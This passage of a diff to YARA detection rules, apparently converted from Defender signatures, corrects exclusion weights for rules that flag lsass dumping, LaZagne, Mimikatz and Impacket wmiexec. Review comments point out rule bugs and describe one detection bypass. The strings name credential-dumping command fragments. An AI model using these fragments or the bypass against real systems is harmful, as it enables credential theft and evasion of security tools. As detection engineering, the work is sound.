$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65516
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-20
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //10 \procdump
$a_00_3 = {20 00 6c 00 73 00 61 00 73 00 73 00 20 00 } //5 lsass
$a_00_4 = {20 00 6c 00 73 00 61 00 73 00 73 00 2e 00 65 00 78 00 65 00 20 00 } //5 lsass.exe
condition:
((#a_00_0 & 1)*65516+(#a_02_1 & 1)*65516+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
((#a_00_0 & 1)*-20+(#a_02_1 & 1)*-20+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
}


@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_F{
description = "HackTool:Win32/DumpLsass.F,SIGNATURE_TYPE_CMDHSTR_EXT,69 00 14 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65516
$a_00_2 = {73 00 69 00 67 00 63 00 68 00 65 00 63 00 6b 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //65516 sigcheck64.exe
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-20
$a_00_2 = {73 00 69 00 67 00 63 00 68 00 65 00 63 00 6b 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //-20 sigcheck64.exe
$a_00_3 = {2d 00 61 00 63 00 63 00 65 00 70 00 74 00 65 00 75 00 6c 00 61 00 } //10 -accepteula
$a_00_4 = {6c 00 73 00 61 00 73 00 73 00 } //10 lsass
condition:
((#a_00_0 & 1)*65516+(#a_02_1 & 1)*65516+(#a_00_2 & 1)*65516+(#a_00_3 & 1)*10+(#a_00_4 & 1)*10) >=20
((#a_00_0 & 1)*-20+(#a_02_1 & 1)*-20+(#a_00_2 & 1)*-20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*10) >=20
}


@ -4,13 +4,13 @@ rule HackTool_Win32_DumpLsass_G{
description = "HackTool:Win32/DumpLsass.G,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 06 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_00_1 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 00 00 } //65516
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_00_1 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 00 00 } //-20
$a_00_2 = {2d 00 61 00 63 00 63 00 65 00 70 00 74 00 65 00 75 00 6c 00 61 00 } //10 -accepteula
$a_00_3 = {2d 00 6d 00 } //5 -m
$a_00_4 = {2f 00 6d 00 } //5 /m
$a_00_5 = {2e 00 64 00 6d 00 70 00 } //5 .dmp
condition:
((#a_00_0 & 1)*65516+(#a_00_1 & 1)*65516+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5) >=15
((#a_00_0 & 1)*-20+(#a_00_1 & 1)*-20+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5) >=15
}
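Review bot: `$a_00_1` (the second -20 exclusion) ends in `90 00 00 00`, yet unlike the `$a_02_1` form used by the DumpLsass .B/.C/.E/.F variants it is typed as a plain `$a_00` string with no `-j ` prefix and no `90 02 04` wildcard; if `$a_00` strings are matched literally, those trailing bytes never follow `\WER\ReportQueue` in a real command line, the exclusion is inert, and the .G rule does not suppress the legitimate WER path that its siblings do. This looks like a converter slip on this one entry rather than an intended difference, and the expected shape is probably `$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 ... 65 00 90 00 }` as in DumpLsass.C, though that needs confirming against the source signature. Whichever is right, a short comment on the string noting that `90 00` is an end-of-pattern marker and not part of the path would help the next reader.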


@ -5,11 +5,11 @@ rule HackTool_Win32_FindAVsignature_A{
strings :
$a_80_0 = {46 69 6e 64 2d 41 56 53 69 67 6e 61 74 75 72 65 } //Find-AVSignature 10
$a_01_1 = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 64 00 6f 00 74 00 6e 00 65 00 74 00 63 00 6c 00 69 00 2e 00 62 00 6c 00 6f 00 62 00 2e 00 63 00 6f 00 72 00 65 00 2e 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2e 00 6e 00 65 00 74 00 2f 00 } //65531 https://dotnetcli.blob.core.windows.net/
$a_01_2 = {2d 00 54 00 65 00 6e 00 61 00 6e 00 74 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 } //65531 -TenantServicePassword
$a_01_3 = {52 00 61 00 70 00 69 00 64 00 37 00 20 00 41 00 67 00 65 00 6e 00 74 00 } //65531 Rapid7 Agent
$a_01_4 = {5c 4d 53 54 49 43 57 65 66 44 65 74 65 63 74 69 6f 6e 73 5c 4c 69 62 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 5c 6f 62 6a 5c 61 6d 64 36 34 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 2e 70 64 62 } //65526 \MSTICWefDetections\Lib\PowershellParser\obj\amd64\PowershellParser.pdb
$a_01_1 = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 64 00 6f 00 74 00 6e 00 65 00 74 00 63 00 6c 00 69 00 2e 00 62 00 6c 00 6f 00 62 00 2e 00 63 00 6f 00 72 00 65 00 2e 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2e 00 6e 00 65 00 74 00 2f 00 } //-5 https://dotnetcli.blob.core.windows.net/
$a_01_2 = {2d 00 54 00 65 00 6e 00 61 00 6e 00 74 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 } //-5 -TenantServicePassword
$a_01_3 = {52 00 61 00 70 00 69 00 64 00 37 00 20 00 41 00 67 00 65 00 6e 00 74 00 } //-5 Rapid7 Agent
$a_01_4 = {5c 4d 53 54 49 43 57 65 66 44 65 74 65 63 74 69 6f 6e 73 5c 4c 69 62 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 5c 6f 62 6a 5c 61 6d 64 36 34 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 2e 70 64 62 } //-10 \MSTICWefDetections\Lib\PowershellParser\obj\amd64\PowershellParser.pdb
condition:
((#a_80_0 & 1)*10+(#a_01_1 & 1)*65531+(#a_01_2 & 1)*65531+(#a_01_3 & 1)*65531+(#a_01_4 & 1)*65526) >=100
((#a_80_0 & 1)*10+(#a_01_1 & 1)*-5+(#a_01_2 & 1)*-5+(#a_01_3 & 1)*-5+(#a_01_4 & 1)*-10) >=100
}
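Review bot: With the weights now signed, the condition `>=100` is unsatisfiable: the only positive contribution is `$a_80_0` at 10 and the other four strings subtract (-5, -5, -5, -10), so the maximum score is 10 and the rule is dead. Before this commit it fired only when one of the benign-marker strings (the dotnetcli URL, `-TenantServicePassword`, `Rapid7 Agent`, the MSTIC .pdb) was present, i.e. exactly backwards, so the sign fix is right, but the threshold or the `Find-AVSignature` weight was likely mis-read from the signature header, which is not visible in this hunk; either `>=10` or a weight of 100 on `$a_80_0` would make the rule meaningful. Until that is settled, a comment such as `// NOTE: threshold unreachable with current weights (max score 10)` above `condition:` would stop someone assuming this rule is live.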


@ -19,9 +19,9 @@ rule HackTool_Win32_ImpacketExec_SA{
$a_00_12 = {72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00 } //1 rundll32
$a_00_13 = {72 00 65 00 67 00 73 00 76 00 72 00 33 00 32 00 } //1 regsvr32
$a_00_14 = {63 00 3a 00 5c 00 70 00 65 00 72 00 66 00 6c 00 6f 00 67 00 73 00 } //1 c:\perflogs
$a_02_15 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 90 08 00 02 68 00 69 00 64 00 65 00 74 00 61 00 62 00 6c 00 65 00 68 00 65 00 61 00 64 00 65 00 72 00 73 00 90 00 } //65436
$a_00_16 = {62 00 6b 00 6e 00 6f 00 64 00 65 00 6d 00 61 00 6e 00 } //65436 bknodeman
$a_02_15 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 90 08 00 02 68 00 69 00 64 00 65 00 74 00 61 00 62 00 6c 00 65 00 68 00 65 00 61 00 64 00 65 00 72 00 73 00 90 00 } //-100
$a_00_16 = {62 00 6b 00 6e 00 6f 00 64 00 65 00 6d 00 61 00 6e 00 } //-100 bknodeman
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_02_15 & 1)*65436+(#a_00_16 & 1)*65436) >=31
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_02_15 & 1)*-100+(#a_00_16 & 1)*-100) >=31
}


@ -8,8 +8,8 @@ rule HackTool_Win32_Impacketwmiexec_D{
$a_00_1 = {20 00 2f 00 63 00 20 00 } //1 /c
$a_00_2 = {20 00 2f 00 51 00 20 00 } //1 /Q
$a_02_3 = {20 00 5c 00 5c 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 5c 00 90 02 20 5c 00 90 02 20 2e 00 62 00 61 00 74 00 90 00 } //10
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //65436 \\127.0.0.1\
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //-100 \\127.0.0.1\
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*10+(#a_00_4 & 1)*65436) >=13
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*10+(#a_00_4 & 1)*-100) >=13
}
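Review bot: The -100 on `$a_00_4` (`\\127.0.0.1\`) is evaluated against the same command line as the other four strings, so it is a hard veto under the control of whoever runs the tool: appending a harmless `\\127.0.0.1\` token to an otherwise matching `cmd.exe /Q /c \\<ip>\...\...bat` line drops the score from 13 to -87 and the rule stays silent. That is presumably inherited from the Defender source and may be fine there because other signatures cover the case, but in a standalone YARA deployment it deserves a comment above the string, e.g. `// NOTE: loopback UNC is a hard exclusion; an attacker-controlled command line can add it to evade`, and the same applies to HackTool_Win32_Impacketwmiexec_RD in the next section.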


@ -8,8 +8,8 @@ rule HackTool_Win32_Impacketwmiexec_RD{
$a_00_1 = {20 00 2f 00 63 00 20 00 } //1 /c
$a_00_2 = {20 00 2f 00 51 00 20 00 } //1 /Q
$a_02_3 = {20 00 5c 00 5c 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 5c 00 90 02 20 5c 00 90 02 20 2e 00 62 00 61 00 74 00 90 00 } //100
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //65436 \\127.0.0.1\
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //-100 \\127.0.0.1\
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*100+(#a_00_4 & 1)*65436) >=103
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*100+(#a_00_4 & 1)*-100) >=103
}


@ -4,8 +4,8 @@ rule HackTool_Win32_LaZagne{
description = "HackTool:Win32/LaZagne,SIGNATURE_TYPE_PEHSTR_EXT,0b 00 0b 00 10 00 00 "
strings :
$a_80_0 = {4d 69 63 72 6f 73 6f 66 74 2e 43 79 62 65 72 2e 4f 62 73 65 72 76 61 74 69 6f 6e 44 65 74 65 63 74 6f 72 73 2e 64 6c 6c } //Microsoft.Cyber.ObservationDetectors.dll 65516
$a_80_1 = {4f 6e 65 43 79 62 65 72 46 54 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //OneCyberFT@microsoft.com 65516
$a_80_0 = {4d 69 63 72 6f 73 6f 66 74 2e 43 79 62 65 72 2e 4f 62 73 65 72 76 61 74 69 6f 6e 44 65 74 65 63 74 6f 72 73 2e 64 6c 6c } //Microsoft.Cyber.ObservationDetectors.dll -20
$a_80_1 = {4f 6e 65 43 79 62 65 72 46 54 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //OneCyberFT@microsoft.com -20
$a_80_2 = {6c 61 5a 61 67 6e 65 2e 65 78 65 2e 6d 61 6e 69 66 65 73 74 } //laZagne.exe.manifest 6
$a_80_3 = {6c 61 7a 61 67 6e 65 2e 63 6f 6e 66 69 67 } //lazagne.config 3
$a_80_4 = {6c 61 7a 61 67 6e 65 2e 73 6f 66 74 77 61 72 65 73 } //lazagne.softwares 3
@ -21,6 +21,6 @@ rule HackTool_Win32_LaZagne{
$a_80_14 = {2e 67 69 74 2e 67 69 74 66 6f 72 77 69 6e 64 6f 77 73 } //.git.gitforwindows 1
$a_80_15 = {2e 73 79 73 61 64 6d 69 6e 2e 61 70 61 63 68 65 64 69 72 65 63 74 6f 72 79 73 74 75 64 69 6f } //.sysadmin.apachedirectorystudio 1
condition:
((#a_80_0 & 1)*65516+(#a_80_1 & 1)*65516+(#a_80_2 & 1)*6+(#a_80_3 & 1)*3+(#a_80_4 & 1)*3+(#a_80_5 & 1)*3+(#a_80_6 & 1)*2+(#a_80_7 & 1)*3+(#a_80_8 & 1)*2+(#a_80_9 & 1)*2+(#a_80_10 & 1)*2+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1) >=11
((#a_80_0 & 1)*-20+(#a_80_1 & 1)*-20+(#a_80_2 & 1)*6+(#a_80_3 & 1)*3+(#a_80_4 & 1)*3+(#a_80_5 & 1)*3+(#a_80_6 & 1)*2+(#a_80_7 & 1)*3+(#a_80_8 & 1)*2+(#a_80_9 & 1)*2+(#a_80_10 & 1)*2+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1) >=11
}


@ -10,14 +10,14 @@ rule HackTool_Win32_Mikatz_dha_{
$a_00_3 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 72 00 79 00 70 00 74 00 41 00 63 00 71 00 75 00 69 00 72 00 65 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4b 00 65 00 79 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x%08x)
$a_00_4 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 65 00 72 00 74 00 47 00 65 00 74 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 43 00 6f 00 6e 00 74 00 65 00 78 00 74 00 50 00 72 00 6f 00 70 00 65 00 72 00 74 00 79 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CertGetCertificateContextProperty (0x%08x)
$a_00_5 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 65 00 72 00 74 00 47 00 65 00 74 00 4e 00 61 00 6d 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CertGetNameString (0x%08x)
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_01_0 & 1)*100+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516) >=103
((#a_01_0 & 1)*100+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20) >=103
}


@ -45,15 +45,15 @@ rule HackTool_Win32_Mimikatz_A_dha_3{
$a_01_3 = {63 00 72 00 65 00 64 00 6d 00 61 00 6e 00 } //1 credman
$a_01_4 = {6c 00 73 00 61 00 73 00 72 00 76 00 } //1 lsasrv
$a_01_5 = {6c 00 6f 00 67 00 6f 00 6e 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //1 logonPasswords
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
